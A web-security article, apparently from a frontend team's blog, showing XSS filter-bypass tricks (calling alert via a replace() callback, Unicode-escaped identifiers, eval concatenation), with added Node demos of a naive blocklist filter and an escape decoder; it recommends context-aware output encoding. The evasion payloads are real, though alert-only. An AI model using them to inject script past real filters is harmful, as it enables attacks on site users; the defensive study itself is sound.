7 Surprising JavaScript Tricks to Bypass XSS Filters
This article reveals a collection of unconventional JavaScript techniques—including regex replacement, Unicode escapes, eval tricks, unusual operator combinations, custom getters/setters, and URL‑encoded payloads—that can evade common XSS filters and strengthen your understanding of web security.
0 Introduction
XSS (Cross‑Site Scripting) attacks inject JavaScript into web pages, and many sites try to stop them by filtering payloads against keyword or pattern blocklists. The article demonstrates several creative JavaScript tricks that slip past such filters, offering insight for both attackers and defenders.
1 Executing Code Through Regex Replacement
When .replace receives a function as its second argument, that function is called once per match with the matched text as its first argument (followed by any capture groups, the match offset and the whole string), so whatever function is passed gets executed. Example:
<code>'XSS'.replace(/XSS/g, alert)</code>
Here alert is invoked as alert('XSS', 0, 'XSS'); since alert only displays its first argument, the call is equivalent to
alert('XSS'). Passing a native function in the callback slot lets an attacker trigger it without ever writing the literal call alert('XSS').
The general form is a custom function that receives the match:
<code>'somestring'.replace(/some/, function($1){ /* do something */ })</code>
Substituting a built‑in such as alert for the custom function gives the one‑liner above. A filter that looks for the call syntax alert( never sees it, because the function is only referenced by name and the call is made inside .replace.
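The callback semantics, as an added example that is not code from the original article: a recorder shows exactly what replace() passes to its callback, a recording stand‑in for alert (constructed here so the demo runs under Node without a dialog) shows why passing the sink directly works, and a constructed blocklist filter keyed on the literal alert( shows what the trick evades.

```javascript
// Added example (not from the original article). The sink and the filter are
// constructed stand-ins for alert() and for a naive blocklist-style XSS filter.

// Record every argument list the replacement callback receives.
// For a pattern without named groups that is (match, ...captures, offset, string).
function recordReplaceArgs(input, pattern) {
  const calls = [];
  input.replace(pattern, (...args) => {
    calls.push(args);
    return ""; // the replacement text is irrelevant for this demo
  });
  return calls;
}

// Stand-in for alert(): like the real dialog it only cares about its first argument.
function makeSink() {
  const seen = [];
  const sink = (msg) => { seen.push(String(msg)); };
  sink.seen = seen;
  return sink;
}

// The article's trick: hand the sink itself to replace(). It is invoked as
// sink("XSS", 0, "XSS"), which for a one-argument sink is sink("XSS").
function callSinkViaReplace(sink) {
  "XSS".replace(/XSS/g, sink);
  return sink.seen;
}

// Constructed blocklist filter that flags only the literal call syntax "alert(".
function naiveAlertFilter(payload) {
  return /alert\s*\(/i.test(payload);
}

// Two payloads with the same effect; only the first one trips the filter.
const PAYLOADS = {
  direct:   "alert('XSS')",
  indirect: "'XSS'.replace(/XSS/g, alert)",
};

// Stand-alone run: print what the callback sees and what the filter decides.
console.log(recordReplaceArgs("aXSSbXSS", /XSS/g));
console.log(callSinkViaReplace(makeSink()));
console.log(naiveAlertFilter(PAYLOADS.direct), naiveAlertFilter(PAYLOADS.indirect));
```

Run it with Node; nothing opens a dialog. The defender's takeaway is that a filter matching call syntax cannot see an invocation that happens through a callback slot, and the same holds for setTimeout, event handlers and every other API that accepts a function value. Context‑aware output encoding, not a longer blocklist, is the fix.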
2 Unicode Escape
Unicode escape sequences can represent characters without using their literal form. For instance:
<code>\u0061\u006c\u0065\u0072\u0074(1)</code>
evaluates to alert(1): JavaScript resolves Unicode escapes inside identifiers at parse time, so the escaped name is the very same identifier as alert, while a filter scanning the source for the string "alert" sees nothing. Mixed with normal characters, the escapes obscure the payload just as well, e.g.:
<code>\u0061lert(1)</code>
Passing the escaped text through eval adds a level of indirection; splitting and concatenating the pieces hides even the \u00 sequence from a filter that scans the source:
<code>eval('\\u'+'0061'+'lert(1)')</code>
Note that the backslash must be doubled inside the string literal: a bare '\u' that is not followed by four hex digits is a syntax error, so the form eval('\u'+'0061'+'lert(1)') would never run. The concatenation yields the string \u0061lert(1), which eval parses as the identifier alert and calls.
Tencent IMWeb Frontend Team
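Both escape forms, plus the eval concatenation, as an added example that is not code from the original article. It assumes a recording stand‑in for alert (passed in as a parameter so the demo runs under Node), a constructed blocklist filter, and a small escape decoder that a defender can run before matching; none of these come from the article.

```javascript
// Added example (not from the original article). The filter, the decoder and
// the recording alert() are constructed for the demo.

// Decode \uXXXX and \u{X...} escapes so a filter can match the decoded form.
// Assumption: the input is JavaScript source text.
function decodeUnicodeEscapes(src) {
  return src.replace(
    /\\u\{([0-9a-fA-F]{1,6})\}|\\u([0-9a-fA-F]{4})/g,
    (_, braced, plain) => String.fromCodePoint(parseInt(braced ?? plain, 16))
  );
}

// Run a payload with a recording alert() in scope. A direct eval inside the
// body sees the same `alert` parameter, which is what the eval trick relies on.
function runWithFakeAlert(payload) {
  const seen = [];
  new Function("alert", payload)((m) => { seen.push(m); });
  return seen;
}

// Does the source text even parse? Returns false on SyntaxError.
function parses(src) {
  try { new Function(src); return true; }
  catch (e) { if (e instanceof SyntaxError) return false; throw e; }
}

// Constructed blocklist filter that flags only the literal "alert(".
function blocklistFilter(payload) {
  return /alert\s*\(/i.test(payload);
}

// Payloads as they would appear in page source. The doubled backslashes are
// only JavaScript string quoting; each payload itself holds a single backslash.
const SAMPLES = {
  fullEscape:  "\\u0061\\u006c\\u0065\\u0072\\u0074(1)",
  mixedEscape: "\\u0061lert(1)",
  bracedEscape: "\\u{61}lert(1)",                 // ES2015 form, same identifier
  evalBare:    "eval('\\u'+'0061'+'lert(1)')",    // bare '\u': does not parse
  evalEscaped: "eval('\\\\u'+'0061'+'lert(1)')",  // '\\u' inside the literal: works
};

// Stand-alone run.
for (const [name, src] of Object.entries(SAMPLES)) {
  console.log(name, "filter:", blocklistFilter(src),
              "decoded filter:", blocklistFilter(decodeUnicodeEscapes(src)),
              "parses:", parses(src));
}
console.log(runWithFakeAlert(SAMPLES.mixedEscape), runWithFakeAlert(SAMPLES.evalEscaped));
```

The decoder is for detection only: it also rewrites escapes inside string literals, which is harmless when the result is merely matched against a blocklist but changes meaning if the output were fed back to an interpreter. As with the callback trick, the robust defence is not a better decoder in front of the blocklist but escaping untrusted data for the context it lands in, so that it is never parsed as script at all.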